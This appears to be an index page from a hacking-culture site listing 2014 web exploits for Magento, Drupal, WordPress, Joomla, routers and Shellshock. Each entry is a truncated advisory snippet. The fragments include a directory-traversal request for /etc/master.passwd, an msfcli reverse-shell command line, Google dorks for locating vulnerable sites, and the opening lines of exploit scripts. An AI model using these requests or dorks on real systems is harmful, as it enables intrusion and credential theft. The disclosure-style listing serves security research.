Recording the best content on hacking techniques, spreading hacker culture, and sharing the essentials of hacking technology

Web application vulnerability: - Magento Server MAGMI Plugin - Remote File Inclusion (RFI)

Exploit found date: 10/24/2014
Security Researcher name: Parvinder Singh Bhasin
Contact info: parvinder.bhasin@gmail.com
twitter: @parvinderb <scorpio>
Currently tested version:
Magento version: Magento CE - 1.8 and newer versions
MAGMI version: v0.7.17a and greater
MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability (RFI) which allow
Published: 2014-10-25 19:25 | Views: 106098 | Comments: 0 | Tags: webapps

Web application vulnerability: - Dell EqualLogic Storage - Remote File Inclusion

# Exploit Title: Remote Directory Traversal exploit for Dell EqualLogic 6.0 Storage
# Date: 09/2013
# Exploit Author: Mauricio Pampim Corrêa
# Vendor Homepage: www.dell.com
# Version: 6.0
# Tested on: Equipment Model Dell EqualLogic PS4000
# CVE : CVE-2013-3304
The malicious user sends GET //../../../../../../../../etc/master.passwd
And the Dell Storage answers r
Published: 2014-10-25 19:25 | Views: 85208 | Comments: 0 | Tags: webapps

Web application vulnerability: - Creative Contact Form (Wordpress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability

#!/usr/bin/python
#
# Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
# Wordpress plugin version: <= 0.9.7
# Joomla extension version: <= 2.0.0
#
# Vulnerability discovered by Gianni Angelozzi
#
# Exploit written by Claudio Viviani
#
# Dork google wordpress: inurl:inurl:sexy-contact-form
# Dork goo
Published: 2014-10-25 19:25 | Views: 159427 | Comments: 0 | Tags: webapps

Web application vulnerability: - Creative Contact Form - Arbitrary File Upload

==========================================================
"Creative Contact Form - The Best WordPress Contact Form Builder" - Arbitrary File Upload
# Author: Gianni Angelozzi
# Date: 08/10/2014
# Remote: Yes
# Vendor Homepage: https://profiles.wordpress.org/creative-solutions-1/
# Software Link: https://wordpress.org/plugins/sexy-contact-form/
# CVE: CVE-
Published: 2014-10-23 23:40 | Views: 107362 | Comments: 0 | Tags: webapps

Web application vulnerability: - DotNetNuke DNNspot Store 3.0.0 Arbitrary File Upload

# Exploit Title: DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitrary File Upload
# Date: 23/01/2014
# Author: Glafkos Charalambous
# Version: 3.0.0
# Vendor: DNNspot
# Vendor URL: https://www.dnnspot.com
# Google Dork: inurl:/DesktopModules/DNNspot-Store/
#
# root@kali:~# msfcli exploit/windows/http/dnnspot_upload_exec payload=windows/shell/revers
Published: 2014-10-23 06:10 | Views: 114375 | Comments: 0 | Tags: webapps

Web application vulnerability: - ZTE ZXDSL-931VII - Unauthenticated Configuration Dump

# Exploit Title: ZTE ZXDSL-931VII Unauthenticated Configuration Dump
# Google Dork: use your imagination
# Date: 09-12-2014
# Exploit Author: L0ukanik0sGR
# Vendor Homepage: www.zte.com.cn
# Software Link: https://www.ote.gr/web/guest/help-and-support/internet/vdsl/-/support/article/870213%3Bjsessionid=01605E58A483CF54BB0E95208F531764.node3_1_OTEGR?! original fi
Published: 2014-10-21 01:40 | Views: 89062 | Comments: 0 | Tags: webapps

Web application vulnerability: - Typo3 JobControl 2.14.0 - Cross Site Scripting / SQL Injection

Mogwai Security Advisory MSA-2014-02
----------------------------------------------------------------------
Title: JobControl (dmmjobcontrol) Multiple Vulnerabilities
Product: dmmjobcontrol (Typo3 Extension)
Affected versions: 2.14.0
Impact: high
Remote: yes
Product link: http://typo3.org/extensions/repository/
Published: 2014-10-21 01:40 | Views: 108989 | Comments: 0 | Tags: webapps

Web application vulnerability: - Drupal Core <= 7.32 - SQL Injection (PHP)

<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection #
# Date: Oct 16 2014 #
# Exploit Author: Dustin Dörr #
# Software Link: http://www.drupal.c
Published: 2014-10-17 19:55 | Views: 100137 | Comments: 2 | Tags: webapps

Web application vulnerability: - Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities

Document Title:
===============
Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1303
Release Date:
=============
2014-10-13
Vulnerability Laboratory ID (VL-ID):
====================================
1303
Common Vulnerability Scoring System:
==============================
Published: 2014-10-16 02:00 | Views: 79967 | Comments: 0 | Tags: webapps

Web application vulnerability: - PayPal Inc BB #85 MB iOS 4.6 - Auth Bypass Vulnerability

Document Title:
===============
PayPal Inc BB #85 MB iOS 4.6 - Auth Bypass Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=895
PayPal Security UID: Vxda0S
Video: http://www.vulnerability-lab.com/get_content.php?id=1338
View: https://www.youtube.com/watch?v=RXubXP_r2M4
Release Date:
=============
2014-10-09
Vuln
Published: 2014-10-15 01:00 | Views: 132273 | Comments: 0 | Tags: webapps

Web application vulnerability: - Tenda A32 Router - CSRF Vulnerability

# Exploit Title: Tenda A32 Router CSRF Vulnerability (reboot the Router)
# CVE ID : CVE-2014-7281
# Date: 2014-10-10
# Exploit Author: zixian
# Vendor Homepage: http://tenda.com.cn/
# Software Link: http://tenda.com.cn/Catalog/Product/325
# Version: V5.07.53_CN
When the administrator is logged in and clicks on the link below, the device will reboot.
<a href="http://192.1
Published: 2014-10-15 01:00 | Views: 135236 | Comments: 0 | Tags: webapps CSRF

Web application vulnerability: - BMC Track-It! - Multiple Vulnerabilities

>> Multiple critical vulnerabilities in BMC Track-It!
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
The application exposes several .NET remoting services on port 9010.
.NET remoting is an RMI technology similar to Java RMI or CORBA which
Published: 2014-10-10 06:35 | Views: 90248 | Comments: 0 | Tags: webapps

Web application vulnerability: - DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities

DrayTek VigorACS SI ( <= 1.3.0)
Vigor ACS-SI Edition is a Central Management System for DrayTek routers and firewalls, providing System Integrators or system administration personnel a real-time integrated monitoring, configuration and management platform.
-----------------------------------------------------------------------
2.1. Default http-auth username/pas
Published: 2014-10-10 06:35 | Views: 88894 | Comments: 0 | Tags: webapps

Web application vulnerability: - Nessus Web UI 2.3.3 - Stored XSS

Nessus Web UI 2.3.3: Stored XSS
=========================================================
CVE number: CVE-2014-7280
Permalink: http://www.thesecurityfactory.be/permalink/nessus-stored-xss.html
Vendor advisory: http://www.tenable.com/security/tns-2014-08
-- Info --
Nessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable Network Sec
Published: 2014-10-10 06:35 | Views: 129277 | Comments: 0 | Tags: webapps xss

Web application vulnerability: - Wordpress Slideshow Gallery 1.4.6 - Shell Upload (Python Exploit)

#!/usr/bin/env python
#
# WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit
#
# WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460)
#
# Vulnerability discovered by: Jesus Ramirez Pichardo - http://whitexploit.blogspot.mx/
#
# Exploit written by: Claudio Viviani - info@homelab.it - http://www.homelab.
Published: 2014-10-08 06:05 | Views: 106034 | Comments: 0 | Tags: webapps exp

Web application vulnerability: - Bash - CGI RCE (MSF) Shellshock Exploit

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  def initialize(info = {})
    super(update_info(info,
      'Name'
Published: 2014-10-06 21:45 | Views: 93364 | Comments: 0 | Tags: webapps exp
